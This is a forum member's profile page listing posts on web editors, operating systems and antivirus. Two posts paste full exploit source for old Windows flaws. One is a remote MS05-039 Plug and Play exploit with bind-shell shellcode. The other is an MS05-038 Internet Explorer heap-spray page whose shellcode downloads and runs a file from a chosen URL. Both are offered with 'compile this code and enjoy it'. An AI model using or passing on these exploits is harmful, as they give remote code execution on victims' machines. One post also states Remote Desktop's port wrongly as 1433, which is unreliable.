st4r-s4t

Members
  • Content Count

    15
  • Joined

  • Last visited

  1. I think if you want to build a site and you don't know HTML (like me) you must use FrontPage (XP or 2003); if you have learned a little or a lot of HTML you can use Dreamweaver, but if you have learned HTML (PHP or ASP...) well, you can use Notepad!!! So I use Dreamweaver because I know a little HTML, and it is good web design software!! Excuse me because my English is no better than this!!!! by
  2. This is the latest version of Yahoo Messenger (not beta): Download Yahoo Messenger Final 7 by
  3. OH..................... My speed is very low i can`t tell you thanks for any things
  4. Oh, OK, I am sorry; this is the new vuln in Plug and Play. Its name is: MS Windows Plug-and-Play Service Remote Universal Exploit (MS05-039). I'm sorry because I'm Iranian and I can't speak English very well!! I HOPE FOR ... by Notice from BuffaloHELP: Whenever you copy and paste from another source you must place QUOTE tags. Source http://imp.ovh.net/fr/ Credit adjusted. Notice from Klass: User warned as verbal warn was given prior. Also next time you post long code use [codebox] [/codebox] tags
  5. This is the c code you can compile it with lcc win 32 or gcc or virtual c++ ... /*Windows 2000 universal exploit for MS05-039-\x6d\x35\x6c\x30\x6e\x6e\x79-*/#define WIN32_LEAN_AND_MEAN#include <windows.h>#include <winnetwk.h>#include <winsock.h>#include <Rpc.h>#include <wchar.h>#include <stdio.h>#include <stdlib.h>#pragma comment(lib, "mpr")#pragma comment(lib, "Rpcrt4")BYTE Data1[0x68] ={0x11,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x11,0x00,0x00,0x00, 0x52,0x00,0x4F,0x00,0x4F,0x00,0x54,0x00,0x5C,0x00,0x53,0x00, 0x59,0x00,0x53,0x00,0x54,0x00,0x45,0x00,0x4D,0x00,0x5C,0x00, 0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x00,0x00,0x00,0x00, 0xFF,0xFF,0x00,0x00,0x21,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0xEE,0xEE,0xEE,0xEE,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x21,0x00,0x00,0x00, 0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00};struct DataStruct1{ BYTE SomeString[0x30]; DWORD RESDataType; DWORD LFD; DWORD SDM1; DWORD SDO; DWORD SDL; DWORD SDM2; BYTE SDA[0x07D0]; DWORD LRD; DWORD MB; DWORD DM;};struct RPCBIND{ BYTE VerMaj; BYTE VerMin; BYTE PacketType; BYTE PacketFlags; DWORD DataRep; WORD FragLength; WORD AuthLength; DWORD CallID; WORD MaxXmitFrag; WORD MaxRecvFrag; DWORD AssocGroup; BYTE NumCtxItems; WORD ContextID; WORD NumTransItems; GUID InterfaceUUID; WORD InterfaceVerMaj; WORD InterfaceVerMin; GUID TransferSyntax; DWORD SyntaxVer;};//from metasploit, before you were bornBYTE 
BindShell[374]={"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c""\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32""\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07""\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24""\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8""\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64""\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e""\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53""\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4""\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9""\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d""\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51""\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54""\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff""\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x22\x11\x89\xe0\x6a""\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff\x55""\x20\x89\xc7\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c""\x24\xac\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10""\x44\x66\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c""\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49""\x51\x51\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff""\xd0\x89\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3""\x6a\xff\xff\x36\xff\xd3\xff\x75\x00\x68\x7e\xd8\xe2\x73\xff\x55""\x04\x31\xdb\x53\xff\xd0"};BYTE PRPC[0x48] ={0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00, 0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00, 0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5, 0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};struct RPCFUNC{ BYTE VerMaj; BYTE VerMin; BYTE 
PacketType; BYTE PacketFlags; DWORD DataRep; WORD FragLength; WORD AuthLength; DWORD CallID; DWORD AllocHint; WORD ContextID; WORD Opnum;};BYTE POP[0x27] ={0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xAC,0x10,0x00,0x00,0x01,0x00,0x00,0x00, 0x94,0x10,0x00,0x00,0x00,0x00,0x09,0x00,0x05,0x08,0x00,0x00,0x00,0x00,0x00,0x00, 0x05,0x08,0x00,0x00,0x41,0x00,0x41};int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer){ BYTE rbuf[0x1000]; DWORD dw; struct RPCBIND RPCBind; memcpy(&RPCBind,&PRPC,sizeof(RPCBind)); UuidFromString(Interface,&RPCBind.InterfaceUUID); UuidToString(&RPCBind.InterfaceUUID,&Interface); RPCBind.InterfaceVerMaj=atoi(&InterfaceVer[0]); RPCBind.InterfaceVerMin=atoi(&InterfaceVer[2]); TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf, sizeof(rbuf), &dw, NULL); return 0;}int Attack(HANDLE PipeHandle){ struct RPCFUNC RPCOP; int bwritten=0; BYTE *LargeBuffer; BYTE rbuf[0x100]; DWORD dw; struct DataStruct1 EvilRPC; memcpy(&EvilRPC,&Data1,sizeof(EvilRPC)); EvilRPC.SDL=0x07C0; memset(EvilRPC.SDA,0x90,0x07D0); EvilRPC.SDA[76]=0x3e; EvilRPC.SDA[77]=0x1e; EvilRPC.SDA[78]=0x02; EvilRPC.SDA[79]=0x75; memset(EvilRPC.SDA+80,0x90,10); EvilRPC.SDA[90]=0x90; memcpy(EvilRPC.SDA+94,BindShell,374); EvilRPC.MB=0x00000004; EvilRPC.DM=0x00000000; EvilRPC.LFD=0x000007E0; EvilRPC.LRD=0x000007E0; memcpy(&RPCOP,&POP,sizeof(RPCOP)); RPCOP.Opnum = 54; RPCOP.FragLength=sizeof(RPCOP)+sizeof(EvilRPC); RPCOP.AllocHint=sizeof(EvilRPC); LargeBuffer=malloc(sizeof(RPCOP)+sizeof(EvilRPC)); memset(LargeBuffer,0x00,sizeof(RPCOP)+sizeof(EvilRPC)); memcpy(LargeBuffer,&RPCOP,sizeof(RPCOP)); memcpy(LargeBuffer+sizeof(RPCOP),&EvilRPC,sizeof(EvilRPC)); printf("Sending payload...\nThis has to time out... 
ctrl+c after 5 secs\ncheck for shell on port 8721"); TransactNamedPipe(PipeHandle, LargeBuffer, sizeof(RPCOP)+sizeof(EvilRPC), rbuf, sizeof(rbuf), &dw, NULL); free(LargeBuffer); return 0;}int main(int argc, char* argv[]){ char *server; NETRESOURCE nr; char unc[MAX_PATH]; char szPipe[MAX_PATH]; HANDLE hFile; if (argc < 2) { printf("Usage: %s <host>\n", argv[0]); return 1; } server=argv[1]; _snprintf(unc, sizeof(unc), "\\\\%s\\pipe", server); unc[sizeof(unc)-1] = 0; nr.dwType = RESOURCETYPE_ANY; nr.lpLocalName = NULL; nr.lpRemoteName = unc; nr.lpProvider = NULL; WNetAddConnection2(&nr, "", "", 0); _snprintf(szPipe, sizeof(szPipe), "\\\\%s\\pipe\\browser",server); hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); BindRpcInterface(hFile,"8d9f4e40-a03d-11ce-8f69-08003e30051b","1.0"); //SendMalformed RPC request Attack(hFile); return 0;} Notice from snlildude87: Credits adjusted.Remember to preview posts before posting to avoid something like this in the future Notice from cmatcmextra: [-codebox-] tags used instead. Should shorten the page size up ... a bit
  6. You can compile this code and enjoy it!! /*+++++++++++++++++++++++++++++++++++++++++++++++ Ms05 038 exploit POC Write By ZwelL 2005 8 11 http://http://www.donews.com/404.html zwell@sohu.comSome code belongs to Lion(cnhonker), regards to him.This code tested on Windows 2003-----------------------------------------------*/#include <stdio.h>#include <winsock2.h>#pragma comment(lib, "ws2_32")// Use for find the ASM code#define PROC_BEGIN __asm _emit 0x90 __asm _emit 0x90\ __asm _emit 0x90 __asm _emit 0x90\ __asm _emit 0x90 __asm _emit 0x90\ __asm _emit 0x90 __asm _emit 0x90#define PROC_END PROC_BEGIN#define SEARCH_STR "\x90\x90\x90\x90\x90\x90\x90\x90\x90"#define SEARCH_LEN 8#define MAX_SC_LEN 2048#define HASH_KEY 13// Define Decode Parameter#define DECODE_LEN 21#define SC_LEN_OFFSET 7#define ENC_KEY_OFFSET 11#define ENC_KEY 0xff// Define Function Addr#define ADDR_LoadLibraryA [esi]#define ADDR_GetSystemDirectoryA [esi+4]#define ADDR_WinExec [esi+8]#define ADDR_ExitProcess [esi+12]#define ADDR_URLDownloadToFileA [esi+16]// Need functionsunsigned char functions[100][128] ={ // [esi] stack layout // kernel32 4 // 00 kernel32.dll {"LoadLibraryA"}, // [esi] {"GetSystemDirectoryA"}, // [esi+4] {"WinExec"}, // [esi+8] {"ExitProcess"}, // [esi+12] // urlmon 1 // 01 urlmon.dll {"URLDownloadToFileA"}, // [esi+16] {""},};// Shellcode stringunsigned char sc[1024] = {0};unsigned int Sc_len;char *htmlbody1="<html><body>\r\n""<script language=\"javascript\">\r\n""shellcode = unescape(\"%u4343%u4343\"+\"";char *htmlbody2="\");\r\n""bigblock = unescape(\"%u0D0D%u0D0D\");\r\n""headersize = 20;\r\n""slackspace = headersize+shellcode.length;\r\n""while (bigblock.length<slackspace) bigblock+=bigblock;\r\n""fillblock = bigblock.substring(0, slackspace);\r\n""block = bigblock.substring(0, bigblock.length-slackspace);\r\n""while(block.length+slackspace<0x40000) block = block+block+fillblock;\r\n""memory = new Array();\r\n""for (i=0;i<750;i++) memory[i] = block + 
shellcode;\r\n""</SCRIPT>\r\n""<object classid=\"CLSID:083863F1-70DE-11d0-BD40-00A0C911CE86\"></object>\r\n""Ms05038 Exploit POC<br>\r\n""Made By ZwelL< http://http://www.donews.com/404.html ASM shellcode main functionvoid ShellCode();// Get function hashstatic DWORD __stdcall GetHash ( char *c ){ DWORD h = 0; while ( *c ) { __asm ror h, HASH_KEY h += *c++; } return( h );}int buildfile(unsigned char *sc, int len){ int i; char writebuf[4096]; char tmp[4096]; FILE *stream; memset(tmp, 0, 4096); memset(writebuf, 0, 4096); for(i = 0; i < len; i++) { sprintf(writebuf, "%s%.2x", writebuf, sc[i] & 0xff); } if(strlen(writebuf)%4!=0) strcat(writebuf, "00"); for(i=0; i<(strlen(writebuf)/4); i++) { strcat(tmp, "\%u"); strncat(tmp, &writebuf[i*4+2], 2); strncat(tmp, &writebuf[i*4], 2); } //printf("%s\n", writebuf); //printf("======================\n%s\n", tmp); if( (stream = fopen( "zwell_ms05038.html", "w+b" )) != NULL ) { fwrite(htmlbody1, strlen(htmlbody1), 1, stream); fwrite( tmp, strlen(tmp), 1, stream ); fwrite(htmlbody2, strlen(htmlbody2), 1, stream); fclose(stream); } else { printf("fopen wrong\n"); exit(0); } return 0;}void Make_ShellCode(char *url1){ unsigned char *pSc_addr; unsigned int Enc_key=ENC_KEY; unsigned long dwHash[100]; unsigned int dwHashSize; int i,j,k,l; // Get functions hash //printf("[+] Get functions hash strings.\r\n"); for (i=0;;i++) { if (functions[i][0] == '\x0') break; dwHash[i] = GetHash((char*)functions[i]); //printf("\t%.8X\t%s\n", dwHash[i], functions[i]); } dwHashSize = i*4; // Deal with shellcode pSc_addr = (unsigned char *)ShellCode; for (k=0;k<MAX_SC_LEN;++k ) { if(memcmp(pSc_addr+k,SEARCH_STR, SEARCH_LEN)==0) { break; } } pSc_addr+=(k+SEARCH_LEN); // Start of the ShellCode for (k=0;k<MAX_SC_LEN;++k) { if(memcmp(pSc_addr+k,SEARCH_STR, SEARCH_LEN)==0) { break; } } Sc_len=k; // Length of the ShellCode memcpy(sc, pSc_addr, Sc_len); // Copy shellcode to sc[] // Add functions hash memcpy(sc+Sc_len, (char *)dwHash, dwHashSize); Sc_len += 
dwHashSize; // Add url memcpy(sc+Sc_len, url1, strlen(url1)+1); Sc_len += strlen(url1)+1; // Deal with find the right XOR byte for(i=0xff; i>0; i--) { l = 0; for(j=DECODE_LEN; j<Sc_len; j++) { if ( ((sc[j] ^ i) == 0x26) || //% ((sc[j] ^ i) == 0x3d) || //= ((sc[j] ^ i) == 0x3f) || //? ((sc[j] ^ i) == 0x40) || //@ ((sc[j] ^ i) == 0x00) || ((sc[j] ^ i) == 0x0D) || ((sc[j] ^ i) == 0x0A) ) // Define Bad Characters { l++; // If found the right XOR byte,l equals 0 break; }; } if (l==0) { Enc_key = i; //printf("[+] Find XOR Byte: 0x%02X\n", i); for(j=DECODE_LEN; j<Sc_len; j++) { sc[j] ^= Enc_key; } break; // If found the right XOR byte, Break } } // Deal with not found XOR byte if (l!=0) { printf("[-] No xor byte found!\r\n"); exit(-1); } // Deal with DeCode string *(unsigned char *)&sc[SC_LEN_OFFSET] = Sc_len; *(unsigned char *)&sc[ENC_KEY_OFFSET] = Enc_key; printf("[+] download url:%s\n", url1);}int help(){ printf("Usage : ms05038.exe url [-t] \n"); printf(" the 't' option will let you test for the shellcode first\n"); exit(0);}void main(int argc, char **argv){ WSADATA wsa; unsigned char url[255]={0}; BOOL b_test; printf("\n========================================\n"); printf("Ms05-038 exploit POC\n"); printf("Write By Zwell\n"); printf("2005-8-11\n"); printf("http://http://www.donews.com/404.html;; printf("zwell@sohu.com\n"); printf("========================================\n\n"); b_test=FALSE; if(argc<2) help(); strncpy(url, argv[1], 255); if(argc == 3) if(!strcmp(argv[2], "-t")) b_test = TRUE; WSAStartup(MAKEWORD(2,2),&wsa); Make_ShellCode(url); printf("[+] Build shellcode successful\n"); buildfile(sc, Sc_len); printf("[+] Build file successful\n"); printf("Now, you can open the builded file(zwell_ms05038.html) with IE to see the result.Good Luck \n"); if(b_test) { printf("Testing the shellcode...\n"); ((void (*)(void)) &sc)(); } return;}// ShellCode functionvoid ShellCode(){ __asm { PROC_BEGIN // C macro to begin 
proc//--------------------------------------------------------------------//// DeCode////-------------------------------------------------------------------- jmp short decode_enddecode_start: pop ebx // Decode start addr (esp -> ebx) dec ebx xor ecx,ecx mov cl,0xFF // Decode len decode_loop: xor byte ptr [ebx+ecx],ENC_KEY // Decode key loop decode_loop jmp short decode_okdecode_end: call decode_startdecode_ok://--------------------------------------------------------------------//// ShellCode////-------------------------------------------------------------------- jmp sc_endsc_start: pop edi // Hash string start addr (esp -> edi) // Get kernel32.dll base addr mov eax, fs:0x30 // PEB mov eax, [eax+0x0c] // PROCESS_MODULE_INFO mov esi, [eax+0x1c] // InInitOrder.flink lodsd // eax = InInitOrder.blink mov ebp, [eax+8] // ebp = kernel32.dll base address mov esi, edi // Hash string start addr -> esi // Get function addr of kernel32 push 4 pop ecx getkernel32: call GetProcAddress_fun loop getkernel32 // Get function addr of urlmon push 0x00006e6f push 0x6d6c7275 // urlmon push esp call ADDR_LoadLibraryA // LoadLibraryA("urlmon"); mov ebp, eax // ebp = urlmon.dll base address/* push 1 pop ecx geturlmon: call GetProcAddress_fun loop geturlmon*/ call GetProcAddress_fun // url start addr = edi//LGetSystemDirectoryA: sub esp, 0x20 mov ebx, esp push 0x20 push ebx call ADDR_GetSystemDirectoryA // GetSystemDirectoryA//LURLDownloadToFileA: // eax = system path size // URLDownloadToFileA url save to a.exe mov dword ptr [ebx+eax], 0x652E615C // "\a.e" mov dword ptr [ebx+eax+0x4], 0x00006578 // "xe" xor eax, eax push eax push eax push ebx // %systemdir%\a.exe push edi // url push eax call ADDR_URLDownloadToFileA // URLDownloadToFileA//LWinExec: mov ebx, esp push eax push ebx call ADDR_WinExec // WinExec(%systemdir%\a.exe);Finished: //push 1 call ADDR_ExitProcess // ExitProcess();GetProcAddress_fun: push ecx push esi mov esi, [ebp+0x3C] // e_lfanew mov esi, [esi+ebp+0x78] // 
ExportDirectory RVA add esi, ebp // rva2va push esi mov esi, [esi+0x20] // AddressOfNames RVA add esi, ebp // rva2va xor ecx, ecx dec ecx find_start: inc ecx lodsd add eax, ebp xor ebx, ebx hash_loop: movsx edx, byte ptr [eax] cmp dl, dh jz short find_addr ror ebx, HASH_KEY // hash key add ebx, edx inc eax jmp short hash_loop find_addr: cmp ebx, [edi] // compare to hash jnz short find_start pop esi // ExportDirectory mov ebx, [esi+0x24] // AddressOfNameOrdinals RVA add ebx, ebp // rva2va mov cx, [ebx+ecx*2] // FunctionOrdinal mov ebx, [esi+0x1C] // AddressOfFunctions RVA add ebx, ebp // rva2va mov eax, [ebx+ecx*4] // FunctionAddress RVA add eax, ebp // rva2va stosd // function address save to [edi] pop esi pop ecx retsc_end: call sc_start PROC_END //C macro to end proc }}
  7. You should learn the C++ and Perl languages (if you want to be a good hacker) and networking, and know how to compile exploits and ... iranian boy
  8. Hi, I'm Iranian and I am trying to make a PHP chat on my site. I tried to use PHPMyChat but it needs PHP 3 and MySQL and... so I came here and posted; therefore I took an account. babay
  9. You can use Remote Desktop Protocol (1433/tcp) to connect to other Windows machines, but it must be turned on and you must have an admin account.
  10. But some people do not know Linux and only think Windows is the only OS!!!! iranian boy
  11. Norton is good but Symantec Corporate 10 is the best!! babay iranian boy
  12. I think Windows is more user-friendly than Linux, but if somebody wants to use a computer professionally he must use Linux (Debian or SUSE or ....). babay iranian boy